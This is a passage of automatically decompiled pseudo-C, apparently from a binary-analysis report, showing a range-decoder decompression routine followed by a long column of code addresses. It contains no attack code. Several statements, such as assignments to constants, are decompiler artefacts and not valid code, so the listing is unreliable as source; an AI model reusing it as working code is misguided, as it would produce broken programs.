								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}










































              0x00406abc
              0x00406ac3
              0x00406ac9
              0x00406acf
              0x00000000
              0x00406ad3
              0x00406adf
              0x00406adf
              0x00406adf
              0x00406ae8
              0x00000000
              0x00000000
              0x00406aee
              0x00000000
              0x00406af5
              0x00406af9
              0x00000000
              0x00000000
              0x00406b02
              0x00406b05
              0x00406b08
              0x00406b0a
              0x00406b0c
              0x00000000
              0x00000000
              0x00406b12
              0x00406b15
              0x00406b17
              0x00406b18
              0x00406b1b
              0x00406b1d
              0x00406b1e
              0x00406b20
              0x00406b23
              0x00406b28
              0x00406b2d
              0x00406b36
              0x00406b49
              0x00406b4c
              0x00406b55
              0x00406b58
              0x00406b80
              0x00406b80
              0x00406b82
              0x00406b90
              0x00406b90
              0x00406b94
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00406b84
              0x00406b84
              0x00406b87
              0x00406b87
              0x00406b88
              0x00406b88
              0x00000000
              0x00406b84
              0x00406b5a
              0x00406b5e
              0x00406b63
              0x00406b63
              0x00406b6c
              0x00406b72
              0x00406b74
              0x00406b77
              0x00000000
              0x00406b7d
              0x00406b7d
              0x00000000
              0x00406b7d
              0x00000000
              0x00406b9a
              0x00406b9a
              0x00406b9e
              0x0040744a
              0x00000000
              0x0040744a
              0x00406ba7
              0x00406bb7
              0x00406bba
              0x00406bbd
              0x00406bbd
              0x00406bbd
              0x00406bc0
              0x00406bc0
              0x00406bc4
              0x00000000
              0x00000000
              0x00406bc6
              0x00406bc9
              0x00406bcc
              0x00406bf6
              0x00406bfc
              0x00406c03
              0x00000000
              0x00406c03
              0x00406bce
              0x00406bd2
              0x00406bd5
              0x00406bda
              0x00406bda
              0x00406be5
              0x00406beb
              0x00406bed
              0x00406bf0
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00406c35
              0x00406c3b
              0x00406c3e
              0x00406c4b
              0x00406c53
              0x00000000
              0x00000000
              0x00406c0a
              0x00406c0a
              0x00406c0e
              0x00407459
              0x00000000
              0x00407459
              0x00406c1a
              0x00406c25
              0x00406c25
              0x00406c25
              0x00406c28
              0x00406c2b
              0x00406c2e
              0x00406c31
              0x00406c33
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x004072ca
              0x004072ca
              0x004072d0
              0x004072d6
              0x004072d9
              0x004072dc
              0x004072f6
              0x004072f9
              0x004072ff
              0x0040730a
              0x0040730a
              0x0040730c
              0x004072de
              0x004072de
              0x004072ed
              0x004072f1
              0x004072f1
              0x0040730f
              0x00407316
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00407318
              0x00407318
              0x0040731c
              0x004074cb
              0x00000000
              0x004074cb
              0x00407328
              0x0040732f
              0x00407337
              0x00407337
              0x00407337
              0x0040733a
              0x0040733d
              0x0040733d
              0x00000000
              0x00000000
              0x00406c5b
              0x00406c5d
              0x00406c60
              0x00406cd1
              0x00406cd4
              0x00406cd7
              0x00406cde
              0x00406ce8
              0x00000000
              0x00406ce8
              0x00406c62
              0x00406c66
              0x00406c69
              0x00406c6b
              0x00406c6e
              0x00406c71
              0x00406c73
              0x00406c76
              0x00406c78
              0x00406c7d
              0x00406c80
              0x00406c83
              0x00406c87
              0x00406c8e
              0x00406c91
              0x00406c98
              0x00406c9c
              0x00406ca4
              0x00406ca4
              0x00406ca4
              0x00406c9e
              0x00406c9e
              0x00406c9e
              0x00406c93
              0x00406c93
              0x00406c93
              0x00406ca8
              0x00406cab
              0x00406cc9
              0x00406ccb
              0x00000000
              0x00406ccb
              0x00406cad
              0x00406cb0
              0x00406cb3
              0x00406cb6
              0x00406cb8
              0x00406cb8
              0x00406cb8
              0x00406cbb
              0x00406cbe
              0x00406cc0
              0x00406cc1
              0x00406cc4
              0x00000000
              0x00000000
              0x00406efa
              0x00406efe
              0x00406f1c
              0x00406f1f
              0x00406f26
              0x00406f29
              0x00406f2c
              0x00406f2f
              0x00406f32
              0x00406f35
              0x00406f37
              0x00406f3e
              0x00406f3f
              0x00406f41
              0x00406f44
              0x00406f47
              0x00406f4a
              0x00406f4a
              0x00406f4f
              0x00000000
              0x00406f4f
              0x00406f00
              0x00406f03
              0x00406f06
              0x00406f10
              0x00000000
              0x00000000
              0x00406f64
              0x00406f68
              0x00406f8b
              0x00406f8e
              0x00406f91
              0x00406f9b
              0x00406f6a
              0x00406f6a
              0x00406f6d
              0x00406f70
              0x00406f73
              0x00406f80
              0x00406f83
              0x00406f83
              0x00000000
              0x00000000
              0x00406fa7
              0x00406fab
              0x00000000
              0x00000000
              0x00406fb1
              0x00406fb5
              0x00000000
              0x00000000
              0x00406fbb
              0x00406fbd
              0x00406fc1
              0x00406fc1
              0x00406fc4
              0x00406fc8
              0x00000000
              0x00000000
              0x00407018
              0x0040701c
              0x00407023
              0x00407026
              0x00407029
              0x00407033
              0x00000000
              0x00407033
              0x0040701e
              0x00000000
              0x00000000
              0x0040703f
              0x00407043
              0x0040704a
              0x0040704d
              0x00407050
              0x00407045
              0x00407045
              0x00407045
              0x00407053
              0x00407056
              0x00407059
              0x00407059
              0x0040705c
              0x0040705f
              0x00407062
              0x00407062
              0x00407065
              0x0040706c
              0x00407071
              0x00000000
              0x00000000
              0x004070ff
              0x004070ff
              0x00407103
              0x004074a1
              0x00000000
              0x004074a1
              0x00407109
              0x0040710c
              0x0040710f
              0x00407113
              0x00407116
              0x0040711c
              0x0040711e
              0x0040711e
              0x0040711e
              0x00407121
              0x00407124
              0x00000000
              0x00000000
              0x00406cf4
              0x00406cf4
              0x00406cf8
              0x00407465
              0x00000000
              0x00407465
              0x00406cfe
              0x00406d01
              0x00406d04
              0x00406d08
              0x00406d0b
              0x00406d11
              0x00406d13
              0x00406d13
              0x00406d13
              0x00406d16
              0x00406d19
              0x00406d19
              0x00406d1c
              0x00406d1f
              0x00000000
              0x00000000
              0x00406d25
              0x00406d2b
              0x00000000
              0x00000000
              0x00406d31
              0x00406d31
              0x00406d35
              0x00406d38
              0x00406d3b
              0x00406d3e
              0x00406d41
              0x00406d42
              0x00406d45
              0x00406d47
              0x00406d4d
              0x00406d50
              0x00406d53
              0x00406d56
              0x00406d59
              0x00406d5c
              0x00406d5f
              0x00406d7b
              0x00406d7e
              0x00406d81
              0x00406d84
              0x00406d8b
              0x00406d8f
              0x00406d91
              0x00406d95
              0x00406d61
              0x00406d61
              0x00406d65
              0x00406d6d
              0x00406d72
              0x00406d74
              0x00406d76
              0x00406d76
              0x00406d98
              0x00406d9f
              0x00406da2
              0x00000000
              0x00406da8
              0x00000000
              0x00406da8
              0x00000000
              0x00406dad
              0x00406dad
              0x00406db1
              0x00407471
              0x00000000
              0x00407471
              0x00406db7
              0x00406dba
              0x00406dbd
              0x00406dc1
              0x00406dc4
              0x00406dca
              0x00406dcc
              0x00406dcc
              0x00406dcc
              0x00406dcf
              0x00406dd2
              0x00406dd2
              0x00406dd2
              0x00406dd8
              0x00000000
              0x00000000
              0x00406dda
              0x00406ddd
              0x00406de0
              0x00406de3
              0x00406de6
              0x00406de9
              0x00406dec
              0x00406def
              0x00406df2
              0x00406df5
              0x00406df8
              0x00406e10
              0x00406e13
              0x00406e16
              0x00406e19
              0x00406e19
              0x00406e1c
              0x00406e20
              0x00406e22
              0x00406dfa
              0x00406dfa
              0x00406e02
              0x00406e07
              0x00406e09
              0x00406e0b
              0x00406e0b
              0x00406e25
              0x00406e2c
              0x00406e2f
              0x00000000
              0x00406e31
              0x00000000
              0x00406e31
              0x00406e2f
              0x00406e36
              0x00406e36
              0x00406e36
              0x00406e36
              0x00000000
              0x00000000
              0x00406e71
              0x00406e71
              0x00406e75
              0x0040747d
              0x00000000
              0x0040747d
              0x00406e7b
              0x00406e7e
              0x00406e81
              0x00406e85
              0x00406e88
              0x00406e8e
              0x00406e90
              0x00406e90
              0x00406e90
              0x00406e93
              0x00406e96
              0x00406e96
              0x00406e9c
              0x00406e3a
